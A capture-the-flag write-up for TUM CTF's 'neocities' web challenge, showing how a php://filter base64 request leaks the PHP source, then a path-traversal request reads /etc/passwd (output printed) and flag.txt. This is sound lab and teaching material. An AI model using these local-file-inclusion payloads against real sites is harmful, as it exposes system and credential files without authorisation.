Title : [writeups] TUM CTF - neocities (Web) #20
Released : 2015-10-26 00:07:44 -0400
Viewed : 1704

So I hope you're well insured, because the nineties have sent us their best thing ever: bright colors and Comic Sans MS. Please end it before everyone dies due to internal bleedings.

1.ctf.link:1123

This is the preview of the link

tum-ctf-web20

After investigating each link, an usual link format for, first try using Conversion Filters for "About" link

http://1.ctf.link:1123/index.php?page=php://filter/convert.base64-encode/resource=about.page

we got

PHA+TmVvQ2l0aWVzIGlzIGEgdG9vbCB3aGljaCBsZXRzIHlvdSBjcmVhdGUgeW91ciBvd24gaG9tZXBhZ2UgLSBhbmQgZXZlbiBob3N0cyBpdCEgVHJ1c3QgdXMsIHlvdSdsbCBiZSB0aGUga2luZyBvZiB5b3VyIHNjaG9vbCB3aXRoIHlvdXIgcGVyc29uYWwsIE5lb0NpdGllcyBwb3dlcmVkIGhvbWVwYWdlITwvcD4KCjxwPkRpc2NsYWltZXI6IEV5ZXMgbWlnaHQgc3RhcnQgdG8gYmxlZWQuIFRlcm1pbmFsIGlsbG5lc3MgbWF5IGhhcHBlbi4gTmVvQ2l0aWVzIGNhbiB1bmRlciBubyBjaXJjdW1zdGFuY2VzIGJlIGhlbGQgbGlhYmxlIGZvciBkYW1hZ2UgY2F1c2VkIGJ5IG91ciBzdXBlciBhd2Vzb21lIGRlc2lnbiBldmVyeWJvZHkgbGlrZXMuPC9wPgoKPGZvcm0gY2xhc3M9IndlbGwiPgogIDxmaWVsZHNldD4KICAgIDxsZWdlbmQ+Q29udGFjdDwvbGVnZW5kPgogICAgPGxhYmVsPlNheSBzb21ldGhpbmc8L2xhYmVsPgogICAgPHRleHRhcmVhPjwvdGV4dGFyZWE+CiAgICA8c3BhbiBjbGFzcz0iaGVscC1ibG9jayI+R2l2ZSB1cyBmZWVkYmFjayE8L3NwYW4+CiAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tcHJpbWFyeSI+U3VibWl0PC9idXR0b24+CiAgPC9maWVsZHNldD4KPC9mb3JtPg==

and after decoded it

<p>NeoCities is a tool which lets you create your own homepage - and even hosts it! Trust us, you'll be the king of your school with your personal, NeoCities powered homepage!</p>

<p>Disclaimer: Eyes might start to bleed. Terminal illness may happen. NeoCities can under no circumstances be held liable for damage caused by our super awesome design everybody likes.</p>

<form class="well">
  <fieldset>
    <legend>Contact</legend>
    <label>Say something</label>
    <textarea></textarea>
    <span class="help-block">Give us feedback!</span>
    <button type="submit" class="btn btn-primary">Submit</button>
  </fieldset>
</form></textarea>

There is no suspicious things. Next try to get "index.php" file

PD9waHAKCiRwYWdlID0gaXNzZXQoJF9HRVRbInBhZ2UiXSkgPyAkX0dFVFsicGFnZSJdIDogImhvbWUucGFnZSI7Cgo/PjwhRE9DVFlQRSBodG1sPgo8aHRtbCBsYW5nPSJlbiI+CiAgPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8dGl0bGU+TmVvQ2l0aWVzPC90aXRsZT4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KICAgIDxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJBIHRpbWVsZXNzIHRoZW1lIGZvciBUd2l0dGVyIEJvb3RzdHJhcC4iPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJEaXZzaG90LCBJbmMuIj4KICAgIDxzdHlsZT4KICAgICNmb28gewogICAgCW1hcmdpbi10b3A6IDgwcHg7CiAgICB9CiAgICA8L3N0eWxlPgoKICAgIDwhLS1baWYgbHQgSUUgOV0+CiAgICAgIDxzY3JpcHQgc3JjPSJodHRwOi8vaHRtbDVzaGltLmdvb2dsZWNvZGUuY29tL3N2bi90cnVuay9odG1sNS5qcyI+PC9zY3JpcHQ+CiAgICA8IVtlbmRpZl0tLT4KCiAgICA8bGluayBocmVmPSJib290c3RyYXAubWluLmNzcyIgcmVsPSJzdHlsZXNoZWV0Ij4KICA8L2hlYWQ+CgogIDxib2R5IGlkPSJ0b3AiIGNsYXNzPSJwcmV2aWV3IiBkYXRhLXNweT0ic2Nyb2xsIiBkYXRhLXRhcmdldD0iLnN1Ym5hdiIgZGF0YS1vZmZzZXQ9IjgwIj4KCTwhLS0gTmF2YmFyCgkgICAgPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gLS0+CgkgPGRpdiBjbGFzcz0ibmF2YmFyIG5hdmJhci1maXhlZC10b3AgbmF2YmFyLWludmVyc2UiPgoJICAgPGRpdiBjbGFzcz0ibmF2YmFyLWlubmVyIj4KCSAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KCSAgICAgICA8YSBjbGFzcz0iYnRuIGJ0bi1uYXZiYXIiIGRhdGEtdG9nZ2xlPSJjb2xsYXBzZSIgZGF0YS10YXJnZXQ9Ii5uYXYtY29sbGFwc2UiPgoJICAgICAgICAgPHNwYW4gY2xhc3M9Imljb24tYmFyIj48L3NwYW4+CgkgICAgICAgICA8c3BhbiBjbGFzcz0iaWNvbi1iYXIiPjwvc3Bhbj4KCSAgICAgICAgIDxzcGFuIGNsYXNzPSJpY29uLWJhciI+PC9zcGFuPgoJICAgICAgIDwvYT4KCSAgICAgICA8YSBjbGFzcz0iYnJhbmQiIGhyZWY9IiI+TmVvQ2l0aWVzPC9hPgoJICAgICAgIDxkaXYgY2xhc3M9Im5hdi1jb2xsYXBzZSIgaWQ9Im1haW4tbWVudSI+CgkgICAgICAgIDx1bCBjbGFzcz0ibmF2IiBpZD0ibWFpbi1tZW51LWxlZnQiPgoJICAgICAgICAgIDxsaT48YSBocmVmPSIvIj5Ib21lPC9hPjwvbGk+CgkgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9pbmRleC5waHA/cGFnZT1hYm91dC5wYWdlIj5BYm91dDwvYT48L2xpPgoJICAgICAgICAgIDxsaT48YSBocmVmPSIvaW5kZXgucGhwP3BhZ2U9Y29taW5nc29vbi5wYWdlIj5HdWVzdGJvb2s8L2E+PC9saT4KCSAgICAgICAgPC91bD4KCSAgICAgICA8L2Rpdj4KCSAgICAgPC9kaXY+CgkgICA8L2Rpdj4KCSA8L2Rpdj4KCiAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiIGlkPSJmb28iPgogIAk8Pz1maWxlX2dldF9jb250ZW50cygkcGFnZSk/PgogIDwvZGl2PgogIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+PGltZyBzcmM9ImllX2xvZ28uZ2lmIj4gPGltZyBzcmM9Im5zX2xvZ28uZ2lmIj4gPGltZyBzcmM9Im5vZnJhbWVzLmdpZiI+IDxpbWcgc3JjPSJub3RlcGFkLmdpZiI+PC9kaXY+CjwvYm9keT4KPC9odG1sPg==

we got

 

<?php

$page = isset($_GET["page"]) ? $_GET["page"] : "home.page";

?><!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>NeoCities</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="A timeless theme for Twitter Bootstrap.">
    <meta name="author" content="Divshot, Inc.">
    <style>
    #foo {
        margin-top: 80px;
    }
    </style>

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->

    <link href="bootstrap.min.css" rel="stylesheet">
  </head>

  <body id="top" class="preview" data-spy="scroll" data-target=".subnav" data-offset="80">
    <!-- Navbar
        ================================================== -->
     <div class="navbar navbar-fixed-top navbar-inverse">
       <div class="navbar-inner">
         <div class="container">
           <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
             <span class="icon-bar"></span>
             <span class="icon-bar"></span>
             <span class="icon-bar"></span>
           </a>
           <a class="brand" href="">NeoCities</a>
           <div class="nav-collapse" id="main-menu">
            <ul class="nav" id="main-menu-left">
              <li><a href="/">Home</a></li>
              <li><a href="/index.php?page=about.page">About</a></li>
              <li><a href="/index.php?page=comingsoon.page">Guestbook</a></li>
            </ul>
           </div>
         </div>
       </div>
     </div>

    <div class="container" id="foo">
      <?=file_get_contents($page)?>
  </div>
  <div class="container"><img src="ie_logo.gif"> <img src="ns_logo.gif"> <img src="noframes.gif"> <img src="notepad.gif"></div>
</body>
</html>

Nice, we got our first clue: <?=file_get_contents($page)?>

this method is vulnerable to LFI attack.

http://1.ctf.link:1123/index.php?page=../../../etc/passwd

 

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false

LFI's. And after some tries, we get the flag in the directory it self

http://1.ctf.link:1123/index.php?page=flag.txt

 

FLAG: hxp{the_nineties_called_they_want_their_design_back}